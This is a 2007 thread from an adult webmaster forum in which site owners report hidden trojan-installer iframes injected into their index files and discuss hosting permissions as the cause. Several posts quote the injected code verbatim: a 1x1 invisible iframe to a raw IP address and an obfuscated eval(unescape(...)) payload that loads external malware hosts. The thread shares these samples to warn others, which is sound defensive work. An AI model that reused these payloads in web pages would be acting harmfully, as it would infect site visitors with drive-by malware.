GoFuckYourself.com - Adult Webmaster Forum

GoFuckYourself.com - Adult Webmaster Forum (https://gfy.com/index.php)
-   Fucking Around & Business Discussion (https://gfy.com/forumdisplay.php?f=26)
-   -   more than 100 of my sites infected with trojans - check yours (https://gfy.com/showthread.php?t=765415)

Antonio 09-02-2007 04:38 AM
more than 100 of my sites infected with trojans - check yours
 
first of all a big thanks to KimJI to pointing it out to me


the sites are on two hosts, dreamhost and rocktflow, all my other hosts seem ok

anyway, if you have sites on these two hosts, you should ckeck them - one line of iframe code in the index file, no idea what the code does




what a lovely way to spend your Sunday morning

Aussie Rebel 09-02-2007 04:54 AM
Can you please post the code so we know what we are looking for? thanks

Matt 26z 09-02-2007 05:04 AM
Are you running any scripts that may have a security hole?

BOSS1 09-02-2007 05:29 AM
Damn good that you noticed before you lost all bookmarkers!

Antonio 09-02-2007 05:30 AM
Quote:
Originally Posted by Aussie Rebel (Post 13022302)
Can you please post the code so we know what we are looking for? thanks

Code:
<iframe src='http://81.95.149.74/22/index.php' width='1' height='1' style='visibility: hidden;'></iframe>

as I said no idea what id does and I don't want to know but I know for sure that I didn't put it there


Quote:
Originally Posted by Matt 26z (Post 13022317)
Are you running any scripts that may have a security hole?

nope, at first I thought it was from the recent linex security hole, but when I started checking my sites - ALL of them were infected (I have linkex on only 15 sites or so), some of them are wordpress blogs, some are single index html file, some are running tgp scripts, basically mixed bag of goodies

gooddomains 09-02-2007 05:49 AM
fucking spyware

ladida 09-02-2007 05:55 AM
It's a trojan installer. You're in for some mess.

facialfreak 09-02-2007 06:00 AM
Seems to be an epidemic with Dreamhost'ed sites ...

And its too bad really ... Dreamhost leaves all files owned by apache by default, so your sites might as well have a flashing neon sign inviting cyber criminals ... :eek2

I feel your pain Antonio, but unfortunately it usually takes something of this nature for webmasters to take a crash course in simple website security.

Scootermuze 09-02-2007 08:41 AM
I had that happen on a few sites of mine from a diofferent server... I guess the perps just make their rounds from host to host..

I started checking them daily and removing the script as they popped up.. eventually went away...

Quickdraw 09-02-2007 08:47 AM
Here is another hack that has hit Dreamhost for sites like dommephonesex.com, thecollegeslut.com, beckybank.com,fortheloveoffeet.com,bbwbecky.com
and haven't been fixed for months..

Code:
>eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%73%72%63%3d%68%74%74%70%3a%2f%2f%73%74%61%74%31%63%6f%75%6e%74%2e%6e%65%74%2f%73%74%72%6f%6e%67%2f%31%36%37%2f%20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%3e%3c%2f%69%66%72%61%6d%65%3e%27%29%3b'));
which turns to this
iframe src=http://stat1count.net/strong/167

and they also have iframe as well

 src='hxxp://mediacount.net/adv/013/new.php' width=1 height=1>

ridikuloz 09-02-2007 08:52 AM
happened to me before.... fuckin' russians :X

TeenCat 09-02-2007 09:39 AM
umm ... i think i am on the internet :) thanks for sharing that info! :thumbsup

Mutt 09-02-2007 11:39 AM
i had that one months ago - removed it and it never came back. i did have a WordPress installation on the server and that's the only guess I have for how they got in.

GrouchyAdmin 09-02-2007 11:48 AM
This is the problem you have when you run a virtualhost without SuExec/SuPHP permissions to set them to the specific user account, and directories are not properly chowned.

There's a performance hit for it, but it's well worth the cost of administration and notifying your clients. One old WP 1.5 install doesn't destroy hundreds of sites.

Pornopat 09-02-2007 11:50 AM
Had that one and it gave me a fucking headache for months.It just kept coming back in different forms.

d-null 10-04-2007 02:26 AM
bumping this because I just noticed that I have been hit on two different hosts

my own site triggered my norton virus detection and I checked and it is the same code but mine was directing to mediacount.net

bastards

d-null 10-04-2007 02:38 AM
I notice that mediacount.net is a russian site as well.:321GFY

Check your index.html files... they only got into my main domains (not the subdomains)

cess 10-04-2007 05:01 AM
Quote:
Originally Posted by facialfreak (Post 13022392)
Seems to be an epidemic with Dreamhost'ed sites ...

And its too bad really ... Dreamhost leaves all files owned by apache by default, so your sites might as well have a flashing neon sign inviting cyber criminals ... :eek2
Eh?? I have two accounts with dreamhost and every domain I've ever added always had extra web security "enabled". Every file on my dreamhost accounts are owned by my user name and not apache.

cess 10-04-2007 05:12 AM
Quote:
Originally Posted by GrouchyAdmin (Post 13023218)
This is the problem you have when you run a virtualhost without SuExec/SuPHP permissions to set them to the specific user account

By default dreamhost does enable that.

d-null 10-04-2007 11:18 AM
mine was not dreamhost and I found the problem on two completely separate distinct servers, so it is a good idea to check your files periodically no matter who you are hosting with

Az A Bay Bay 10-04-2007 12:52 PM
congrats!

riddler 10-04-2007 12:56 PM
rocketflow servers seem to get rooted alot.

alby_persignup 10-04-2007 01:26 PM
another trojan attacks!


All times are GMT -7. The time now is 11:09 PM.

Powered by vBulletin® Version 3.8.8
Copyright ©2000 - 2025, vBulletin Solutions, Inc.
©2000-, AI Media Network Inc123